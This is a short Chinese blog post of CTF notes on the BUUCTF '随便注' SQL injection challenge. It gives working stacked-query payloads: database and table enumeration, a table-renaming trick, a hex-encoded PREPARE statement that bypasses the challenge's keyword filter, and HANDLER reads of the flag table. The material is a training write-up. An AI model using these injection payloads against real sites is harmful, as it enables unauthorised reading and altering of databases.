CTF-SQL注入笔记

已于 2022-09-28 17:55:24 修改
阅读量429 收藏
点赞数
分类专栏: CTF 文章标签: sql mysql
于 2022-09-27 16:19:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35697696/article/details/127069196
版权

BUUCTF

BUUCTF 随便注

关键字: 堆叠查询、MySQL prepare执行16进制编码后语句、
过滤了关键词return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

?inject=0' order by 3 --+ 
// 看库
?inject=1';show databases; --+
// 看ctftraining表
?inject=1';use ctftraining; show tables; %23

在这里插入图片描述
在这里插入图片描述
?inject=1';use ctftraining; show columns from FLAG_TABLE; --+这里应该不是flag
在这里插入图片描述
逐个看
在这里插入图片描述

绕过姿势

  1. rename

    • 1’; rename table words to word1; rename table 1919810931114514 to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);#

  2. prepare from

    • select * from 1919810931114514 (encode hex)
    • set@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare inject1 from @a;excute inject1;
    • 该语句不能同时有set&prepare,随便换个大写即可

  3. handler

    • 例子1’; handler FlagHere open as a; handler a read next;#
    • payload: 1’;handler 1919810931114514 open as a;handler a read next; #
最低0.47元/天 解锁文章
朋克归零膏
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CTF] SQL注入的一些经验总结(未完待续)【更新:2022.11.25】
ZXW_NUDT的博客
11-17 6200
关于SQL注入的思维导图可以点开看一下大图
CTFSQL 注入 总结
algae
08-15 958
思路 技巧 常见URL编码 # %23 工具 sqlmap 绕过
CTF Web SQL注入专项整理(持续更新中)_ctf sql注入
最新发布
2401_84970121的博客
05-12 1111
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
CTF-SQL注入总结
SWC0619的博客
03-11 8230
SQL注入总结(一)
CTF学习笔记——sql注入(1)
Obs_cure的博客
08-09 724
一、[强网杯 2019]随便注
CTF__(1)Web之SQL手工注入
weixin_30911451的博客
11-24 144
等待更新 转载于:https://www.cnblogs.com/HeroCat/p/10013445.html
CTF用的各种脚本,各类古典加解密的脚本,RSA常用脚本,SQL盲注脚本,编码加解密神器
12-29
在这个特定的压缩包文件中,包含了一系列用于CTF比赛的工具和脚本,主要涉及到古典加解密、RSA算法、SQL注入攻击的盲注技术以及编码和解密的实用工具。 首先,让我们详细讨论一下这些关键知识点: 1. **古典加解密...
CTF线下AWD脚本合集.zip
03-31
2. **自动化攻击脚本**:针对常见漏洞的利用脚本,例如SQL注入、XSS攻击等,可以一键执行。 3. **漏洞检测库**:包含了各种已知漏洞的信息,帮助选手识别和利用它们。 4. **防御脚本**:用于加固自己的服务器,...
毕业设计论坛源码jsp-WriteUp2017:某局CTF
06-06
毕业设计论坛源码jsp 安全检测专业论坛考试WriteUp 0x00前言 ...另外一处是个SQL注入。懒得对着屏幕一个个敲Cookie信息(内外网物理隔离),直接走注入。 注入地址是http://ip/admin/_content/_About/As
CTF撰写:CTF挑战的撰写
02-11
- **Web安全**:创建模拟漏洞的应用,如SQL注入、XSS攻击、文件包含等,让选手通过渗透测试技术找出并修复问题。 - **逆向工程**:编写含有特定逻辑的程序,要求参赛者通过反编译、动态调试等方式理解其内部运作,...
CTFWriteUp:一些CTF花絮
05-09
- **Web安全**:利用Ruby的HTTP库进行请求响应分析,探测Web应用漏洞,如SQL注入、XSS攻击等。 - **逆向工程**:使用Ruby的反汇编器和动态调试工具,辅助分析二进制文件或恶意软件的行为。 - **密码学**:Ruby有强大...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
2024年网络安全最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入(2),2024年最新阿里P7大牛整理
2401_84302761的博客
05-12 874
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4801
以pikachu靶场练习来学习ctf知识
SQL注入学习总结
YouthBelief的博客
10-09 4607
SQL注入1.sql注入原理2.sql注入的分类3.sql注入可能出现的功能点4.判断是否存在sql注入Mysql注入中常用函数一、联合查询注入二、报错注入三、布尔盲注四、时间盲注五、堆叠注入六、json注入5.sql注入的绕过测试环境总结 1.sql注入原理 web程序未对用户输入的数据进行严格的检查和过滤就拼接到后台的sql语句中执行,从而被黑客利用进行数据库的增删查改或写入webshell。 2.sql注入的分类 根据数据类型分为:数字型、字符型、搜索型。 根据提交方式分为:get型 post型 c
ctfShow sql注入笔记
xiaobai_20190815的博客
05-06 1045
遇到了sql注入的题目,记录一下sqlmap使用过程 一、手工注入测试 1、简单的万能注入先测试一下 用户名:admin') or 1=1# /admin' and 1=1 # / admin' or 1=1 # /admin' and -1=-1 .... 密码:123' 结果没测出来,也没报错,一点反应都没有 二、sqlmap工具扫描 先用sqlmap跑一下,找出注入点 1、将请求包写入1.txt,然后执行sqlmap -r 1.txt --batch 存在时间注入...
ctfshow web入门 命令执行payload
2h4ox1n9
06-15 1671
ctfshow web
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
CTF】命令执行RCE
qq_53099119的博客
04-02 2629
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值